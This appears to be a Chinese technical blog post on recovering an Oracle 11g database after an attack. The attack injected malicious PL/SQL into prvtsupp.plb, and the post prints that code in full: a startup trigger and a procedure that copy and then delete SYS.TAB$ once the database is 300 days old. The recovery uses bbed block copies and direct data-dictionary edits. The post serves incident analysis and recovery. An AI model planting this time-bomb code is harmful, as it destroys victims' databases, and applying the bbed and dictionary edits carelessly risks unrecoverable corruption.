点击▲关注 “数据和云” 给公众号标星置顶
更多精彩 第一时间直达
李翔宇,云和恩墨西区交付技术顾问,长期服务移动运营商行业客户,熟悉Oracle 性能优化,故障诊断,特殊恢复。
近期大量的客户数据库软件被注入恶意代码,导致数据库无法启动,报错ORA-00600: internal error code, arguments:[16703], [1403], [20],大致的原因和预防措施可参考下面文章(复制打开,或点击”阅读原文“):
http://www.eygle.com/archives/2018/07/recover_ora-600_16703.html
大致的意思是由于恶意攻击,$ORACLE_HOME/rdbms/admin/prvtsupp.plb被注入恶意代码。核心部分为一个触发器一个存储过程,清空了tab$,导致数据库启动时,bootstrap阶段无法完成。
create or replace triggerDBMS_SUPPORT_DBMONITOR
after startup on database
declare
begin
DBMS_SUPPORT_DBMONITORP;
end;
/
触发器用于启动数据库后调用DBMS_SUPPORT_DBMONITORP这个存储过程,存储过程代码如下:
PROCEDUREDBMS_SUPPORT_DBMONITORP IS
DATE1 INT :=10;
BEGIN
SELECTTO_CHAR(SYSDATE-CREATED ) INTO DATE1 FROM V$DATABASE;
IF (DATE1>=300)THEN
EXECUTE IMMEDIATE'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select *from sys.tab$';
DELETE SYS.TAB$;
COMMIT;
EXECUTE IMMEDIATE'alter system checkpoint';
END IF;
END;
/
该存储过程逻辑为:判断数据库的创建时间是否大于 300 天,如果大于300天则ctas备份tab$之后,delete tab$。
如果有备份的话,那么很简单就不展开了,本文主要介绍没备份的方法。
首先手工构造场景:
模拟DBMS_SUPPORT_DBMONITORP里的内容
SQL> @swl
System altered.
SQL> select count(*) fromt;
COUNT(*)
----------
13982
SQL> create table t_bak as select* from tab$;
Table created.
SQL> delete from tab$;
1251 rows deleted.
SQL> commit;
Commit complete.
SQL> alter systemcheckpoint;
System altered.
SQL> shutdown abort;
ORACLE instance shut down.
此时启动数据库报错ORA-00600: internal error code, arguments: [16703], [1403], [20]
SQL*Plus: Release 11.2.0.4.0Production on Wed Feb 13 04:21:27 2019
Copyright (c) 1982, 2013,Oracle. All rights reserved.
Connected to an idle instance.
SQL> startup
ORACLE instance started.
Total System Global Area 1269366784bytes
Fixed Size 2252864 bytes
Variable Size 1191186368 bytes
Database Buffers 67108864 bytes
Redo Buffers 8818688 bytes
Database mounted.
ORA-01092: ORACLE instanceterminated. Disconnection forced
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00600: internal errorcode, arguments: [16703], [1403], [20], [], [], [],
[], [], [], [], [], []
Process ID: 3255
Session ID: 125 Serial number:5
恢复思路:
由于有且仅有tab$被delete,所以如果能恢复tab$的数据则数据库将得以恢复,这里我想到的大致恢复方法如下(欢迎大家提供更多的恢复思路):
根据dump redo可以找到tab$被delete的rdba以及具体条目,使用bbed逐一还原(此方法非常麻烦,如果该库的表特别多,会增加更多工作量)。
由于恶意代码中,delete tab$前,ctas了一份tab$的备份,可以尝试先open数据库,再根据备份的tab$ insert到tab$中(此方法相对比较方便)。
odu抽取数据,重建库(如果库特别大,比如好几个t,甚至10t,100t的库则耗时太长)
本文只介绍第二种比较方便的方法,
恢复步骤大致如下:
open数据库
根据备份的tab$ insert到tab$中
在恢复之前首先简单介绍一下tab$,tab$是cluster C_OBJ#中的一个table,CLUSTER KEY为OBJ#,C_OBJ#中还包括有ICOL$、IND$、COL$、CLU$、I_OBJ#、COLTYPE$等等bootstrap核心对象,tab$在数据库中是非常核心的一个基表,它记录了table的段头地址以及统计信息。在数据库open过程中,需要访问到的基表对象如果在tab$中不存在,则数据库将无法open,报错即为ORA-00600:internal error code, arguments: [16703], [1403], [xxx]。
CREATE CLUSTERC_OBJ#("OBJ#" NUMBER) PCTFREE 5 PCTUSED 40 INITRANS 2 MAXTRANS 255 STORAGE( INITIAL 136K NEXT 200K MINEXTENTS 1 MAXEXTENTS2147483645 PCTINCREASE 0 OBJNO 2 EXTENTS (FILE 1 BLOCK 144))
SIZE 800
CREATE TABLE TAB$("OBJ#"NUMBER NOT NULL,"DATAOBJ#" NUMBER,"TS#" NUMBER NOT NULL,"FILE#"NUMBER NOT NULL,"BLOCK#" NUMBER NOT NULL,"BOBJ#" NUMBER,"TAB#"NUMBER,"COLS" NUMBER NOT NULL,"CLUCOLS" NUMBER,"
PCTFREE$" NUMBERNOT NULL,"PCTUSED$" NUMBER NOT NULL,"INITRANS" NUMBER NOT NULL,"MAXTRANS"NUMBER NOT NULL,"FLAGS" NUMBER NOT NULL,"AUDIT$" VARCHAR2(38)NOT NULL,"ROWCNT" NUMBER,"BLKCNT" NUMBER,"EMPCNT"NUMBER,"AVGSPC" NUMBER,"CHNCNT" NUMBER,"AVGRLN" NUMBER,"AVGSPC_FLB"NUMBER,"FLBCNT" NUMBER,"ANALYZETIME" DATE,"SAMPLESIZE"NUMBER,"DEGREE" NUMBER,"INSTANCES" NUMBER,"INTCOLS"NUMBER NOT NULL,"KERNE
LCOLS" NUMBERNOT NULL,"PROPERTY" NUMBER NOT NULL,"TRIGFLAG" NUMBER,"SPARE1"NUMBER,"SPARE2" NUMBER,"SPARE3" NUMBER,"SPARE4"VARCHAR2(1000),"SPARE5" VARCHAR2(1000),"SPARE6" DATE) STORAGE( OBJNO 4 TABNO 1) CLUSTER C_OBJ#(OBJ#)
如何open数据库?
知道了在数据库open过程中,需要访问到的基表对象如果在tab$中不存在将报错ORA-00600: internal error code, arguments:[16703], [1403], [xxx],那么将这些对象的信息还原回tab$,则数据库将open成功。
如何确定数据库open需要访问哪些核心基表呢?
找一个正常的数据库做open时的10046,过程如下:
SQL> startupmount;
ORACLE instancestarted.
Total SystemGlobal Area 1269366784 bytes
Fixed Size 2252864 bytes
Variable Size 754978752 bytes
DatabaseBuffers 503316480 bytes
Redo Buffers 8818688 bytes
Database mounted.
SQL> @46on
Statementprocessed.
Statementprocessed.
SQL> alter databaseopen;
Database altered.
SQL> @46off
/u01/app/oracle/diag/rdbms/test/test/trace/test_ora_1769.trc
Statementprocessed.
简单的对10046 trace文件进行筛选则可以找到这些基表的obj#,并在一台同平台同版本的数据库上查询这些对象的rdba地址以及其他信息
[oracle@test ~]$grep "TABLE ACCESS"/u01/app/oracle/diag/rdbms/test/test/trace/test_ora_1769.trc|awk '{print$7}'|sort|uniq|sed 's/obj=/,/'|awk '{printf $1}'|sed 's/^,//'
10,101,103,104,105,118,12939,1297,12973,1300,13003,1302,1304,13059,1306,1307,1309,1314,13273,13298,13604,14,14137,15,16,160,161,17,18,19,192,2,20,21,22,221,225,226,227,228,23,25,252,28,29,294,297,300,301,302,304,307,31,311,32,390,4,433,436,438,446,448,451,453,455,463,5,506,514,515,517,5541,5582,567,5780,5794,5797,5804,5814,587,59,6,61,6571,6731,69,713,7144,717,721,74,8,80,83,86,88,92,95,98,99
SQL> SELECT a.OBJ#,TAB#,a.DATAOBJ#,BOBJ#,NAME,DBMS_ROWID.ROWID_RELATIVE_FNO(a.ROWID)FILE_ID,DBMS_ROWID.ROWID_BLOCK_NUMBER(a.ROWID) BLOCK_ID
2 FROMTAB$ a,obj$ b
3 WHEREa.obj#=b.obj#
4 ANDA.OBJ# IN (10,101,103,104,105,118,12939,1297,12973,1300,13003,1302,1304,13059,1306,1307,1309,1314,13273,13298,13604,14,14137,15,16,160,161,17,18,19,192,2,20,21,22,221,225,226,227,228,23,25,252,28,29,294,297,300,301,302,304,307,31,311,32,390,4,433,436,438,446,448,451,453,455,463,5,506,514,515,517,5541,5582,567,5780,5794,5797,5804,5814,587,59,6,61,69,713,7144,717,721,74,8,80,83,86,88,92,95,98,99)
5 orderby 6,7;
这些对象在同版本同平台的数据库上的rdba地址一般都是一致的,所以找一台正常运行的同版本同平台的数据库(最好是比较干净的库,否则后续处理会比较麻烦),使用bbed进行替换,用sql拼接出bbed的命令
SQL> SELECT DISTINCT'copy file 2 block '||block_id||' to file '||FILE_ID||' block '||BLOCK_ID FROM(
2 SELECTa.OBJ#,TAB#,a.DATAOBJ#,BOBJ#,NAME,DBMS_ROWID.ROWID_RELATIVE_FNO(a.ROWID)FILE_ID,DBMS_ROWID.ROWID_BLOCK_NUMBER(a.ROWID) BLOCK_ID
3 FROMTAB$ a,obj$ b
4 WHEREa.obj#=b.obj#
5 ANDA.OBJ# IN (10,101,103,104,105,118,12939,1297,12973,1300,13003,1302,1304,13059,1306,1307,1309,1314,13273,13298,13604,14,14137,15,16,160,161,17,18,19,192,2,20,21,22,221,225,226,227,228,23,25,252,28,29,294,297,300,301,302,304,307,31,311,32,390,4,433,436,438,446,448,451,453,455,463,5,506,514,515,517,5541,5582,567,5780,5794,5797,5804,5814,587,59,6,61,69,713,7144,717,721,74,8,80,83,86,88,92,95,98,99));
可以看到这里需要替换38个数据块,替换后可以成功open数据库
尝试open数据库:SQL> conn as sysdba
Connected to anidle instance.
SQL> startup
ORACLE instancestarted.
Total System GlobalArea 1269366784 bytes
Fixed Size 2252864 bytes
Variable Size 1191186368 bytes
DatabaseBuffers 67108864 bytes
Redo Buffers 8818688 bytes
Database mounted.
Database opened.
从alert日志可以看到此时数据库open伴随着ora-7445,并且5分钟后就会crash掉,所以要抓紧着5分钟的操作时间
如何将备份的tab$insert回tab$?
由于tab$的备份表在tab$中并没有恢复所以无法查询,下面需要根据redodump去确定tab$的备份表t_bak的rdba
SQL> desc t_bak
ERROR:
ORA-03113: end-of-fileon communication channel
Process ID: 2812
Session ID: 125 Serialnumber: 7
通过对logdump搜索OBJ:2(C_OBJ#的dataobj#)、OP:11.2(insert操作)、tabn:1(C_OBJ#中tab$的tab#),以及查出来的t_bak的obj#,不难找到create table as t_bak对tab$的redo日志:
CHANGE #2 TYP:2CLS:1 AFN:1 DBA:0x00407b2c OBJ:2 SCN:0x0000.000f5a8b SEQ:1 OP:11.2 ENC:0 RBL:0KTBRedo
op: 0x11 ver: 0x01
compat bit: 4(post-11) padding: 1
op: F xid: 0x0004.00f.0000011e uba: 0x00c00630.0050.37
Block cleanout record,scn: 0x0000.000f5a8b ver: 0x01 opt: 0x02,entries follow...
itli: 1 flg: 2 scn: 0x0000.000f5a8b
KDO Op code: IRP rowdependencies Disabled
xtype: XA flags: 0x00000000 bdba: 0x00407b2c hdba: 0x00400090
itli: 2 ispac: 0 maxfr: 4863
tabn: 1 slot: 2(0x2)size/delt: 123
fb: -CH-FL-- lb:0x2 cc: 36 cki: 0
null:
01234567890123456789012345678901234567890123456789012345678901234567890123456789
可以看到t_bak在tab$的rdba地址为0x00407b2c(file1 block 31532),cki为0即cluster key为kdbr[0]
与redo dump一致,下面开始恢复tab$中t_bak的记录,由于是cluster block所以过程有点繁琐
t_bak已经恢复完成,下面insert回tab$
SQL> insert intotab$ select * from (select * from t_bak where obj# in (select obj# from t_bak whereobj#<>14751 minus select obj# from tab$));
982 rows created.
SQL> commit;
Commit complete.
SQL> select count(*)from t;
COUNT(*)
----------
13982
至此数据库基本恢复完成。
但是通过hcheck脚本检查数据字典一致性发现还是有一些问题存在:
SQL> @hcheck
HCheck Version07MAY18 on 14-FEB-2019 22:49:53
----------------------------------------------
Catalog Version11.2.0.4.0 (1102000400)
db_name: LXY
Catalog Fixed
ProcedureName Version Vs Release Timestamp
Result
------------------------------... ---------- -- ---------- --------------
------
.-LobNotInObj ... 1102000400<= *All Rel* 02/14 22:49:53 PASS
.-MissingOIDOnObjCol ... 1102000400<= *All Rel* 02/14 22:49:53 FAIL
HCKE-0002: Object typecolumn with missing OID$ (Doc ID 1360268.1)
OBJ#=12946 Name=SYS.AQ$SCHEDULER$_EVENT_QTABIntCol#=20=USER_DATA TabProp=
OBJ#=12953 Name=SYS.SCHEDULER$_REMDB_JOBQTABIntCol#=28=USER_DATA
TabProp=539101206
OBJ#=12953 Name=SYS.SCHEDULER$_REMDB_JOBQTABIntCol#=31=SYS_NC00031$
TabProp=539101206
OBJ#=12953 Name=SYS.SCHEDULER$_REMDB_JOBQTABIntCol#=46=SYS_NC00046$
TabProp=539101206
OBJ#=12987 Name=SYS.SCHEDULER_FILEWATCHER_QTIntCol#=28=USER_DATA
TabProp=539101190
OBJ#=12987 Name=SYS.SCHEDULER_FILEWATCHER_QTIntCol#=35=SYS_NC00035$
TabProp=539101190
OBJ#=13273 Name=SYS.AQ_EVENT_TABLEIntCol#=25=USER_DATA TabProp=539363346
OBJ#=13281 Name=SYS.AQ$AQ_EVENT_TABLEIntCol#=20=USER_DATA TabProp=
OBJ#=13282 Name=SYS.AQ$_AQ_EVENT_TABLE_FIntCol#=24=USER_DATA TabProp=
OBJ#=13285 Name=SYS.AQ_PROP_TABLEIntCol#=28=USER_DATA TabProp=539101186
OBJ#=13591 Name=SYS.SYS$SERVICE_METRICS_TABIntCol#=28=USER_DATA
TabProp=539101186
发现了11处问题,都是HCKE-0002:Object type column with missing OID$。这是什么意思呢?
分析hcheck脚本的MissingOIDOnObjCol存储过程:
Procedure MissingOIDOnObjCol
(nF In Number Default 0,
VerChk In Number Default 5,
Verbose In Boolean Default FALSE)
Is
nFr Number ;
Cursor sCur1 Is
Select o.obj# , o.type#, o.owner#,o.name, c.col#, c.intcol#,
c.name cname, t.property
From obj$ o, col$ c, coltype$ ct, oid$ oi, tab$ t
Where o.obj# = ct.obj#
And ct.obj# = c.obj#
And ct.col# = c.col#
And ct.intcol# = c.intcol#
And oi.oid$(+) = ct.toid
And o.obj# = t.obj#(+)
And oi.oid$ is null;
ps1 Varchar2(10) := 'HCKE-0002';
ps1a Varchar2(65) := 'Object type columnwith missing OID ps1n Varchar2(40) := '(Doc ID 1360268.1)';
CursorRun Boolean := FALSE;
Begin
If ( nF = 0) Then
nFr := FindFname('MissingOIDOnObjCol') ; Else nFr :=nF;
End If ;
If ChecknCatVnFR (nCatV, nFr, VerChk) = FALSE Then Return;End If;
For c1 In sCur1 Loop
If (not CursorRun) Then
report_failure('FAIL',ps1,ps1a,ps1n,CursorRun);
End If;
put_line(' OBJ#='||c1.obj#||'Name='||Owner(c1.owner#)||'.'
||c1.name||'IntCol#='||c1.intcol#||'='||c1.cname
||'TabProp='||c1.property);
Fatal := Fatal + 1 ;
End Loop ;
If (CursorRun) Then put(chr(10)) ; else put_line('PASS');End If ;
End ;
仔细对脚本进行分析,推测是当表的字段类型为type类型的对象时,coltype$的toid和oid$的oid$不匹配导致的,应该是之前为了open数据库替换块的时候造成的。
以OBJ#=12946Name=SYS.AQ$SCHEDULER$_EVENT_QTAB IntCol#=20=USER_DATA为例继续分析:
由于数据字典不一致,该表是不可以正常访问:
SQL> desc SYS.AQ$SCHEDULER$_EVENT_QTAB
ERROR:
ORA-00600: internal error code, arguments:[16687], [12946], [20], [], [], [], [], [], [], [], [], []
SQL> select * fromSYS.AQ$SCHEDULER$_EVENT_QTAB;
select *from SYS.AQ$SCHEDULER$_EVENT_QTAB
*
ERROR atline 1:
ORA-21700: object does not exist or is marked fordelete
对正常的数据库查询可以看的SYS.AQ$SCHEDULER$_EVENT_QTAB的字段名为USER_DATA的字段类型为SCHEDULER$_EVENT_INFO,通过下面的查询可以发现确实不匹配(以oid$的为准,因为之前替换的是C_OBJ#,而coltype$是C_OBJ#中的一个表):
SQL> select oid$ from oid$ where obj# in (selectobj# from obj$ where name='SCHEDULER$_EVENT_INFO');
OID$
--------------------------------
7BB17EE961D00845E0536438A8C00848
SQL> select toid from coltype$ where obj# in(select obj# from obj$ where name='AQ$SCHEDULER$_EVENT_QTAB') and intcol#=20;
TOID
--------------------------------
81673B4EDDF5111FE0536438A8C02F5D
通过下面的查询也可以推出以oid$的为准
SQL> select toid from type$ where toid in('7BB17EE961D00845E0536438A8C00848','81673B4EDDF5111FE0536438A8C02F5D');
TOID
--------------------------------
7BB17EE961D00845E0536438A8C00848
修改coltype$后恢复正常:
SQL> update coltype$ set toid='7BB17EE961D00845E0536438A8C00848'where obj# in (select obj# from obj$ where name='AQ$SCHEDULER$_EVENT_QTAB') andintcol#=20;
1 row updated.
SQL> commit;
Commit complete.
SQL> @flc
System altered.
System altered.
SQL> select * fromAQ$SCHEDULER$_EVENT_QTAB;
no rows selected
逐一修改后,再次执行hcheck:
SQL> @hcheck
HCheck Version07MAY18 on 15-FEB-2019 01:56:00
----------------------------------------------
Catalog Version11.2.0.4.0 (1102000400)
db_name: LXY
15-FEB-2019 01:56:01 Elapsed: 1 secs
---------------------------------------
Found 0 potentialproblem(s) and 0 warning(s)
PL/SQL proceduresuccessfully completed.
Statementprocessed.
至此整个数据库比较完整的恢复完毕。
原创:李翔宇